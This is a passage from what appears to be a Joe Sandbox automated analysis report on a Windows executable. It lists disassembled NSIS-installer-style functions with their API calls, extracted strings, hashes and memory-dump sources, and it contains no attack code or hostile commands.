                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                  • String ID: @%F$N$open
                                                                                                                                                                                  • API String ID: 3928313111-3849437375
                                                                                                                                                                                  • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                                                                  • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                                                                                                                                  • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                                                                                                                                  Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                                                                                                                  • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                                                                                                                  • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                                                                                                                                  • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                                                                                                                    • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                                                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                    • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                    • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                                                                                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                  • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                  • String ID: 82D$@%F$@rD$A
                                                                                                                                                                                  • API String ID: 3347642858-1086125096
                                                                                                                                                                                  • Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                                                                                                                                  • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                                                                                                                                  • Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                                                                                                                                  • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                                                                                                                                  Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                                                                                                                                  • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                                                                                                                    • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                                                    • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                                                  • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                                                                                                                  • wsprintfA.USER32 ref: 00406B4D
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                                                                                                                    • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                    • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                  • String ID: F$%s=%s$NUL$[Rename]
                                                                                                                                                                                  • API String ID: 565278875-1653569448
                                                                                                                                                                                  • Opcode ID: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                                                                                                                                  • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                                                                                                                                  • Opcode Fuzzy Hash: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                                                                                                                                  • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                                                                                                                                  Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                  • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                  • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                  • String ID: F
                                                                                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                                                                                  • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                                                                  • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                                                                                                                                  • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                                                                  • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                                                                                                                                  Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                  • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                  • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                  • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                  • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                  • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                  • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                  • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                  • API String ID: 1641139501-220328614
                                                                                                                                                                                  • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                                                                                                  • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                                                                                                                                  Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                  • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                  • API String ID: 3294113728-3145124454
                                                                                                                                                                                  • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                                                                                                  • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                                                                                                  • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                                                                                                                                  Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                                                                                                                  • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                                                                                                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                                                                                                                  • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                  • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                  • API String ID: 3734993849-2769509956
                                                                                                                                                                                  • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                                                                                                  • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                                                                                                                                  • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                                                                                                                                  Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
